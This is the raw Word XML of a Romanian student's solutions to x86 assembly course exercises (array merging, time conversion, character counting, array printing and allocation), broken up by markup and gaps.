    <w:p w14:paraId="169B7225" w14:textId="77777777" w:rsidR="005E1AD2" w:rsidRPr="005E1AD2" w:rsidRDefault="005E1AD2" w:rsidP="005E1AD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476C038" w14:textId="77777777" w:rsidR="005E1AD2" w:rsidRPr="005E1AD2" w:rsidRDefault="005E1AD2" w:rsidP="005E1AD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E1AD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int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E1AD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main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(</w:t>
      </w:r>
      <w:r w:rsidRPr="005E1AD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void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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB908D3" w14:textId="77777777" w:rsidR="005E1AD2" w:rsidRPr="005E1AD2" w:rsidRDefault="005E1AD2" w:rsidP="005E1AD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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67945061" w14:textId="77777777" w:rsidR="005E1AD2" w:rsidRPr="005E1AD2" w:rsidRDefault="005E1AD2" w:rsidP="005E1AD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E1AD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int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E1AD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sum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E1AD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=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gramStart"/>
      <w:r w:rsidRPr="005E1AD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;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3FDC8F40" w14:textId="77777777" w:rsidR="005E1AD2" w:rsidRPr="005E1AD2" w:rsidRDefault="005E1AD2" w:rsidP="005E1AD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E1AD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int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E1AD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underflow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E1AD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=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E1AD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task2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(</w:t>
      </w:r>
      <w:r w:rsidRPr="005E1AD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E1AD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&lt;&lt;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E1AD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31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5E1AD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E1AD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&lt;&lt;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E1AD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31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5E1AD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&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="005E1AD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sum</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0B706751" w14:textId="77777777" w:rsidR="005E1AD2" w:rsidRPr="005E1AD2" w:rsidRDefault="005E1AD2" w:rsidP="005E1AD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5E1AD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printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(</w:t>
      </w:r>
      <w:r w:rsidRPr="005E1AD2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"</w:t>
      </w:r>
      <w:r w:rsidRPr="005E1AD2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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>%d</w:t>
      </w:r>
      <w:r w:rsidRPr="005E1AD2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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E1AD2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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>%d</w:t>
      </w:r>
      <w:r w:rsidRPr="005E1AD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\n</w:t>
      </w:r>
      <w:r w:rsidRPr="005E1AD2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"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5E1AD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underflow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5E1AD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sum</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="72383277" w14:textId="77777777" w:rsidR="005E1AD2" w:rsidRPr="005E1AD2" w:rsidRDefault="005E1AD2" w:rsidP="005E1AD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E1AD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task3</w:t>
      </w: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(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="70F4E73A" w14:textId="77777777" w:rsidR="005E1AD2" w:rsidRPr="005E1AD2" w:rsidRDefault="005E1AD2" w:rsidP="005E1AD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E1AD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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E57A0C4" w14:textId="77777777" w:rsidR="005E1AD2" w:rsidRPr="005E1AD2" w:rsidRDefault="005E1AD2" w:rsidP="005E1AD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78791C4" w14:textId="77777777" w:rsidR="0058117D" w:rsidRDefault="0058117D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0244C50F" w14:textId="114B4EEF" w:rsidR="00E32554" w:rsidRDefault="000012BB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F1EC06" w14:textId="263535A3" w:rsidR="000012BB" w:rsidRDefault="000012BB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000012BB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62577B17" wp14:editId="4ABADB06">
            <wp:extent cx="5943600" cy="1707515"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1175753479" name="Imagine 1" descr="O imagine care conține text, scrisoare, document, Fon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53479" name="Imagine 1" descr="O imagine care conține text, scrisoare, document, Font&#10;&#10;Descriere generată automat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CFE3" w14:textId="77777777" w:rsidR="000012BB" w:rsidRDefault="000012BB" w:rsidP="000012BB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5400"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6340000D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294EEA89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merge1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53884E41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temp_len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2F2EEE34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end_merge1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36750B85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347C3DC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[temp_1 + </w:t>
      </w:r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3331A0E5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merged_temp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11F64018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F059676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0469FA1F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merge1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AD3526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end_merge1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDCF45B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1A972326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merge2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332C2559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temp_len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3FA1982E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end_merge2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3557F62D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A8BF18B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[temp_2 + </w:t>
      </w:r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35BE2921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merged_temp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5B3CA357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0531DF7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4FB17302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6595EB3E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merge2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436E895B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end_merge2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02984E1D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7F97126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print:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277684A4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08CB5D26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0012B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print_loop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000012B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7CC13EE9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16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C97751F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end_print_loop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7974DF21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3A0F006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merged_temp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2024D38C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PRINTF32 `%d \</w:t>
      </w:r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`,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3FD472A2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43E8359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7D41C6A5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print_loop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5F6E958F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0012B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end_print_loop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000012B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306C8543" w14:textId="77777777" w:rsid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PRINTF32 `\n\</w:t>
      </w:r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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EC930A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8A9D811" w14:textId="77777777" w:rsidR="000012BB" w:rsidRDefault="000012BB" w:rsidP="000012BB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5400"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000012BB">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E5DFE08" wp14:editId="30DB5C85">
            <wp:extent cx="5943600" cy="1625600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1399072042" name="Imagine 1" descr="O imagine care conține text, scrisoare, document, hârtie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72042" name="Imagine 1" descr="O imagine care conține text, scrisoare, document, hârtie&#10;&#10;Descriere generată automat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2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2980C2" w14:textId="77777777" w:rsidR="00FA7F8D" w:rsidRDefault="00FA7F8D" w:rsidP="000012BB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5400"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="004B7C02" w14:textId="1461FCBC" w:rsidR="000012BB" w:rsidRDefault="000012BB" w:rsidP="000012BB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5400"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>b.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092436CA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b: Implement `void </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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convert_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(int s, int *</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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hh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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, int *mm, int *ss)` function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9A6BB6" w14:textId="77777777" w:rsid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</w:pPr>
    </w:p>
    <w:p w14:paraId="787DD206" w14:textId="5D100B9D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0012B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convert_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000012B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0DEF322F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2C64EE3F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3714B111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FD9AC46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4CB2BDC4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0026D4DC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6CC0A86D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60A59C2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s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46222897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12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hh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="277BFCC7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16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mm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9D228D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20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ss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59436745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9DD9910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1545A9DF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C928630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0C329F6E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3600</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1AF716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5E85BC57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div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4B973C08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3E6E45D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4BD37503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A3CDAE5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catul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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= ore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA63EC2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</w:p>
    <w:p w14:paraId="13C281D4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nu ne </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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mai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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trb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27FB6454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rest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7244BAD6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51C09927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60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C05F48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43143F7F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div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7AD4CC04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0A3B056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catul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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= minute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B0A8E3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restul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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=  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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secunde</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3E4BD78B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E98C97B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467679A8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4A25F32E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2CEEFAB0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713F6A5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03EA0770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0CCAD9BE" w14:textId="77777777" w:rsidR="000012BB" w:rsidRDefault="000012BB" w:rsidP="000012BB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5400"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55C0ADF7" w14:textId="0998F604" w:rsidR="000012BB" w:rsidRDefault="000012BB" w:rsidP="000012BB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5400"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>c.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09982177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TODO c: Convert all `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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` elements of `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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seconds_arr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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` to (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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hh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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, mm, ss) format and display the result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C48846F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For each element, store the result in `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ss_t</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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`, `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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mm_t</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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`, `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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hh_t</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000012BB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` memory areas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C2433E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59A6DE0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207607BD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0012B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loop_convert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000012B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6B139D92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len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6A90E7EB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end_loop_convert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="541E0234" w14:textId="77777777" w:rsidR="000012BB" w:rsidRPr="000012BB" w:rsidRDefault="000012BB" w:rsidP="000012BB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E476AF2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seconds_arr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34DE8887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582868E0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214C3E4E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04FF0384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63695E0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ss_t</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="372091AF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mm_t</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7781C235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hh_t</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="48047113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6D72CFA0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convert_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="68941247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16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138E1007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C09950A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26A778D3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01D3087A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17F8F149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44D4381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63238F5E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663FEB61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D35C719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ss_t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5323E246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mm_t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22AC6941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hh_t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4B4EA393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fmt_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="22E62AC0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7302D440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16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E95868C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95786E5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0DDED776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38FC7C4B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49392C73" w14:textId="77777777" w:rsidR="000012BB" w:rsidRPr="000012BB" w:rsidRDefault="000012BB" w:rsidP="000012BB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0012BB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0012BB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loop_convert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="062D84AB" w14:textId="1B47511E" w:rsidR="00FA7F8D" w:rsidRDefault="000012BB" w:rsidP="00FA7F8D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</w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000012B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end_loop_convert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000012BB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7DBD411D" w14:textId="77777777" w:rsidR="00FA7F8D" w:rsidRPr="00FA7F8D" w:rsidRDefault="00FA7F8D" w:rsidP="00FA7F8D"/>
    <w:p w14:paraId="74BF298B" w14:textId="77777777" w:rsidR="00FA7F8D" w:rsidRPr="00FA7F8D" w:rsidRDefault="00FA7F8D" w:rsidP="00FA7F8D"/>
    <w:p w14:paraId="5C0413D8" w14:textId="0744FBD7" w:rsidR="00FA7F8D" w:rsidRDefault="003A4125" w:rsidP="00FA7F8D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A4125">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">VAR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>CB2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7E7272" w14:textId="4DD349C7" w:rsidR="003A4125" w:rsidRDefault="003A4125" w:rsidP="00FA7F8D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A4125">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DC23D7F" wp14:editId="0CFB0DE6">
            <wp:extent cx="5943600" cy="998855"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37852297" name="Imagine 1" descr="O imagine care conține text, hârtie, document, informație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2297" name="Imagine 1" descr="O imagine care conține text, hârtie, document, informație&#10;&#10;Descriere generată automat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6380" cy="99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6A22" w14:textId="0C942097" w:rsidR="003A4125" w:rsidRDefault="003A4125" w:rsidP="00FA7F8D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A4125">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51908FD6" w14:textId="18DFFD85" w:rsidR="003A4125" w:rsidRDefault="003A4125" w:rsidP="00FA7F8D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FC964F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61F28B1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TODO a:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0468FFE5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Faceti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produsul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dintre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numarul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caractere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din vector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mai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mici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decat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'K'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2DB5C1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cel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al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caracterelor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mai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mari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sau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egale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decat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'K'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A2847B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Puneti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in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product_answer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rezultatul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. (ATENTIE!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product_answer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asteapta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7CC13494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un word (short).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0B0010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00E27AD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0A14E4BA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5E9774FB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736FB0F9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1EE540F6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;;index la vector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF9E49F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loop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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC49E00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24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEE319A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end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F1C559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al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byte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[playlist +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5751B4DD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75</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749466D6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jl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maimici</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C3A16CD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maimare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B89A870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A412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maimici</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A412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4B0FB52A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;;cate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elem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mici</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="34A5FC5A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5ECED858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loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404E8508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3A412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maimare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A412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1F524E50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;;cate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elem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mari</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="339314B3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2C8DF55D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loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0ABE8F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end:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0491C016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6682B74C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3FBEDE5D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18656403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04BA92D9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mul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04A03473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PRINTF32 `%d \n\x0`,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7AA010BA" w14:textId="77777777" w:rsidR="003A4125" w:rsidRDefault="003A4125" w:rsidP="00FA7F8D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="012A2AAA" w14:textId="04321D4D" w:rsidR="003A4125" w:rsidRDefault="003A4125" w:rsidP="00FA7F8D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>b.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34187C23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</w:t>
      </w:r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TODO b:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5F2441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fiecare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element din playlist,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puneti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in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vectorul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answer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restul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1EFEADC7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impartirii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lui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la 41.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5D6ECE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3A70A190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0DF2EB28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3B3408D7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5643F97E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08C74B5E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60A2FA89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loop1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67724C1C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26DEAF0E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24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EE809B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end1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C88FF4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60474EB8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al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byte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[playlist +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2AA3C2D6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677644FC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41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F416F0F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div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4C4E616C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PRINTF32 `%d \n\x0`,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75FC574E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6CAE3AD4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answer+</w:t>
      </w:r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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A412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7313BBA4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inc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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3A412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edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="571280AE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3A412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3A412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loop1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDF8805" w14:textId="77777777" w:rsidR="003A4125" w:rsidRPr="003A4125" w:rsidRDefault="003A4125" w:rsidP="003A412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3A412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lastRenderedPageBreak/>
        <w:t>end1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AD9C18" w14:textId="77777777" w:rsidR="003A4125" w:rsidRDefault="003A4125" w:rsidP="00FA7F8D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ED811DF" w14:textId="2F13ADFC" w:rsidR="0071525C" w:rsidRDefault="0071525C" w:rsidP="00FA7F8D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0071525C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21066643" wp14:editId="2A9DE4C3">
            <wp:extent cx="5943600" cy="1555115"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1283503396" name="Imagine 1" descr="O imagine care conține text, hârtie, document, Fon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03396" name="Imagine 1" descr="O imagine care conține text, hârtie, document, Font&#10;&#10;Descriere generată automat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4E80" w14:textId="4FCFD039" w:rsidR="0071525C" w:rsidRDefault="0071525C" w:rsidP="0071525C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63996620" w14:textId="221CF058" w:rsidR="0071525C" w:rsidRDefault="0071525C" w:rsidP="0071525C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1448CE28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;TODO a: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Implementati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`void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print_array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(unsigned int *a, int N)`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gram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</w:t>
      </w:r>
      <w:proofErr w:type="gram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afisa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="48198D07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elementele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vectorului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`a` de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dimensiune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`N` pe o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singura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linie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separate de cate un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spatiu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37DD2236" w14:textId="44BB87E0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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39765160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71525C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print_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0071525C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0B1CAEF6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6670DA19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126BDCE8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F06725E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mov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eax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, 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455E61EE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50DFC2DF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3343D5EE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4C72DB09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+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6D49BE5C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+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12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4118C44F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loop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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2FF253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40703C02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2CBAFB42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+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1C45E759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+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*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40C9090A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7B6C97F3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fmt_int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="100E44E2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printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E755278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29019746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3D151A5E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10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA15BFE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je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end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625302ED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inc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[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arr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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A42E6B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loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26957D10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end:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEB9F82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+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1D53301F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+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12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1B69CC56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44D0C620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184D8D06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60AD572" w14:textId="77777777" w:rsidR="0071525C" w:rsidRDefault="0071525C" w:rsidP="0071525C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4960282F" w14:textId="59CFE195" w:rsidR="0071525C" w:rsidRDefault="0071525C" w:rsidP="0071525C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>b.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0301ED87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TODO b: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Implementati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`int*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alloc_array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(int N)` care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aloca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memorie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(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dinamic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)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`N`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intregi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. Memoria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alocata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trebui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zeroizata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7C020EC9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alocare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memorie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puteti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folosi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functiile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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FE1E71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- `void *malloc(int size)`, care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aloca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`size`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octeti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. Memoria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alocata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nu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este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zeroizata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30E2DBB3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 SAU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A13253E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  - `void *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calloc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(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size_t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nmemb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,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size_t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size)`, care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aloca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nmemb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`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elemente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fiecare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dimensiune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`size`. Memoria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alocata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este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zeroizata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1B886C61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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB28932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RECOMANDARE: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folositi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calloc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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4639B3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71525C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alloc_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
